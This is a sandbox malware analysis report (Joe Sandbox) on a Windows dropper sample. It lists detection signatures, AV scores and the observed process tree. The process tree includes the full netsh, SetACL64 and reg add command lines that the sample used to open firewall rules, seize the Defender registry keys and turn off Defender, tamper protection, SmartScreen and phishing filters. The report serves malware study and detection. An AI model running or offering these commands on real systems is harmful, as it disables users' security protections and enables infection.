Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4hIPvzV6a2.exe

Overview

General Information

Sample name:4hIPvzV6a2.exe
renamed because original name is a hash value
Original sample name:99a7d3f6669bc38e1fe1ca11e9085516.exe
Analysis ID:1515274
MD5:99a7d3f6669bc38e1fe1ca11e9085516
SHA1:a81034e3d7c91817f2864795f85e2c137f3afafb
SHA256:0a982520cd694fa4eed2a58829908080c9b004df99f79af26a0e3a86fa7197f0
Tags:exeuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds extensions / path to Windows Defender exclusion list (Registry)
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Disables the Smart Screen filter
Disables the phising filter of Microsoft Edge
Machine Learning detection for dropped file
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Windows Defender Exclusions Added - Registry
Too many similar processes found
Uses 32bit PE files
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • 4hIPvzV6a2.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\4hIPvzV6a2.exe" MD5: 99A7D3F6669BC38E1FE1CA11E9085516)
    • netsh.exe (PID: 6252 cmdline: netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • netsh.exe (PID: 6128 cmdline: netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2816 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SetACL64.exe (PID: 2496 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 600 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2336 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 6180 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 5800 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 3488 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 7088 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2996 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
    • cmd.exe (PID: 6340 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2920 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2836 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3120 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2596 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1908 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4996 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1148 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4428 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2336 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1456 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5576 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3992 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3488 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6444 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7088 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5856 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2664 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2996 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3864 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3156 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2920 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4856 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2496 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2596 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2008 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1368 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6916 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6404 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1456 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4592 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5576 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
No configs have been found
No yara matches
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6404, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\DisableAutoExclusions
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exeReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exeVirustotal: Detection: 28%Perma Link
Source: 4hIPvzV6a2.exeReversingLabs: Detection: 36%
Source: 4hIPvzV6a2.exeVirustotal: Detection: 43%Perma Link
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exeJoe Sandbox ML: detected
Source: 4hIPvzV6a2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 4hIPvzV6a2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdbp( source: oofzzwcvgbcojt.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: oofzzwcvgbcojt.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Change of critical system settings

barindex
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions DisableAutoExclusions
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,7_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF68685CF15
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,11_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF68685CF15
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 4hIPvzV6a2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.wolfpackheights.click
Source: SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com
Source: SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: 4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B
Source: reg.exeProcess created: 76
